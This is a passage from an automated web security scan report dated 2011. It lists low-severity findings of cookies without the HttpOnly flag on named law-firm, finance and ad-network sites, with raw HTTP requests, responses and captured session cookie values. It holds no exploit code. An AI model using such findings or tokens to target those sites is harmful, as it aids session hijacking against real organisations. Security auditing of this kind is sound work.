<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...

14.38. http://www.pillsburylaw.com/index.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?pageid=12&itemid=1908 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...

14.39. http://www.pillsburylaw.com/scripts/images/arrows-default.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.1.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 12:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
location: /404.htm
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

14.40. http://www.pomerantzlaw.com/cases.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...

14.41. http://www.privateequityinfo.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...

14.42. http://www.privatemoneytalk.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.privatemoneytalk.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: www.privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 11:02:31 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=476ca5a720fd88c52806f4c507b4c8d3; path=/
Location: http://privatemoneytalk.com/?utm_source=msn&utm_medium=cpc&utm_term=private%20equity
Content-Length: 0
Content-Type: text/html; charset=UTF-8


14.43. http://www.provequity.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.provequity.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=BAMHPCLDDEKLDIMNNNEELLBB; path=/
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...

14.44. http://www.providenceequitypartners.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.providenceequitypartners.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.providenceequitypartners.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=CAMHPCLDELCDGHFEIMOCJHMO; path=/
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...

14.45. http://www.stroock.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stroock.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6906920;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Set-Cookie: CFTOKEN=39383083;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv
...[SNIP]...

14.46. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.usaa.com
Path:   /inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004 HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Content-Type: text/html
Content-Language: en-US
Date: Thu, 12 May 2011 11:24:17 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
Set-Cookie: MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
Set-Cookie: tempCookie=testCookie
Set-Cookie: dcenv=DCITC; path=/; domain=usaa.com
Content-Length: 5180

<html>
<head>
<noscript><meta http-equiv="refresh" content="0; url=https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004&bpjs=false"></noscript>
<script language="J
...[SNIP]...

14.47. http://ad.amtk-media.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amtk-media.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:12 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4217
Connection: close


<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...

14.48. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 11:01:14 GMT
Server: GFE/2.0
Content-Type: text/html


14.49. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?&pub=2137329&code=8842770&cch=8841762&l=300x250&tmz=-5&area=-1&res=1920&rnd=0.9122231449000537&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F&loc=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sat, 14 May 2011 11:39:23 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3
C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
